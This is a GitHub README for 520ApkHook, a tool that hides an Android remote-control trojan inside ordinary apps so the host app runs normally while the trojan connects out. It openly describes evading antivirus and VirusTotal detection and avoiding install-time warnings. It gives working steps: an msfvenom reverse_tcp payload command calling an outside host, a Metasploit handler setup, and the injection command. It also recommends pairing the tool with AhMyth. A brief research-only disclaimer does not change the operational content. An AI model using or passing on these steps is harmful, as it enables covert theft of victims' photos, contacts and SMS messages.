Skip to content
forked from ba0gu0/520apkhook

将安卓远控Apk附加进普通的App中,运行新生成的App时,普通App正常运行,远控正常上线。Attach the Android remote control APK to a regular app. When the newly generated app is launched, the regular app operates as normal while the remote control goes online seamlessly.

Notifications You must be signed in to change notification settings

zy1p/520apkhook

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

31 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

520_APK_HOOK

介绍

  • 将编写的安卓远控程序,注入到正常的App中,运行app时安卓远控程序也会上线。

  • 修复上一版本的bug,使用java重写,同时还重写了520ApkBox程序,专门用来运行运行APP和远控App。

  • 520ApkBox是一个java编写的App,主要作用是一个安卓虚拟机,任何App可以不用任何修改就可以正常运行,可以绕过现在各种App的安全检测。同时此App还是一个加载器,通过DexClassesLoder加载远控的Dex文件并启动上线。

  • 520ApkHook是Java编写的注入工具,将被注入的App和远控App注入到一个App中。

  • 项目地址: https://github.com/ba0gu0/520apkhook

  • 作者: BaoGuo

版本升级

  • 2024-07-02

    • 修复Linux运行bug,缺少so库文件。
  • 2024-06-20

    • 修复各种bug。
    • 新增了改包模块,把payload apk的包名修改掉,去掉特征,避免被杀软识别。目前修改后效果不错,各安全管家、virustotal都不报毒。
  • 2024-05-21

    • 修复了520apkhook的相关问题(app中文名报错、apk签名被标记。)

    • 新增了随机签名的功能,先获取原始app的相关签名信息,根据这些信息重新生成新的签名,签名密码每次都不一样,避免被标记。(有些app会无法识别签名信息,可以自己用jadx获取到app的签名信息,然后生成证书,使用ApkSigner进行重新签名。华为目前还有问题,改签名也会被识别恶意app)

    • 更换了两个安卓虚拟机,NewBlackboxSpaceCore。安卓版本支持到5-14

    • 新增了-b, --boxName参数,用来指定SpaceCore还是NewBlackBox,默认SpaceCore,如果出现卡顿或者闪退,可以尝试切换到NewBlackBox。直接指定参数 -b NewBlackBox 即可。

  • 2023-06-05

    • 上版本忘记添加32位app支持,此次升级加入32位app支持。更换了虚拟机项目依赖,稳定性更好一下。

    • 支持安卓5-12版本,不支持最新的安卓13。

    • 问题1、目前有问题的app,微信、ES文件浏览器。

    • 问题2、被注入的app读取到的文件、图片、通讯录、短信是虚拟机的内容,但是注入的payload获取到的是实体机的内容。

优点

  • 相比于普通的安卓远控,此版本app在进行远控时,被注入的app可以正常运行。

  • 注入后的app在安装时,手机管家不会有任何安全提示,普通的远控程序,安装时手机管家会有安全警示。

  • 理论上来说,只要远控软件使用的是纯Java或者Kotlin编写,就可以使用,不一定必须是msf生成的apk。

使用

  1. 下载Releases中打包好的jar包
  1. msfmsfvenom
msfvenom -p android/meterpreter/reverse_tcp lhost=114.114.114.114 lport=3306 -o ~/Downloads/msf.apk
  1. msfconsole
# 启动 msfconsole

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 3306
set exitonsession false
exploit -j
  1. 520ApkHook

msf由于加载机制问题,需要-o参数,才可以获取照片、通讯录、短信等。

如果在运行app时,提示版本太老、一堆权限提示,可以把-o去掉,但是权限会出问题。

java -jar a520ApkHook-1.0-jar-with-dependencies.jar -o ~/Downloads/想进行注入的App.apk ~/Downloads/msf.apk
  1. BaoGuo仍给你一个Apk,请安装它!

搭配其他远控使用

  • 推荐搭配AhMyth,配在一起贼爽。

使用AhMyth时,不需要添加-o参数,不然app会提示版本太老,一堆权限提示太假。

https://github.com/Morsmalleo/AhMyth

BUG

  • 使用SpaceCore作为基础容器,能运行90%的app,但可能会出现app不流畅。
  • 使用NewBlackBox作为基础容器,目前测试不能在模拟器中运行,微信无法启动。
  • 其他未测试...

项目依赖

重点说明

  • 本项目仅用于安全研究, 禁止利用脚本进行攻击, 使用本脚本产生的一切问题和本人无关.

  • 由于此软件是基于安卓虚拟化来实现的,虚拟化软件对于不同版本的系统会出现BUG,可以自行修改520ApkBox项目源码 (欢迎大佬提交pull) .

Start 曲线

Start 曲线

About

将安卓远控Apk附加进普通的App中,运行新生成的App时,普通App正常运行,远控正常上线。Attach the Android remote control APK to a regular app. When the newly generated app is launched, the regular app operates as normal while the remote control goes online seamlessly.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Java 93.7%
  • C++ 3.3%
  • AIDL 2.5%
  • Other 0.5%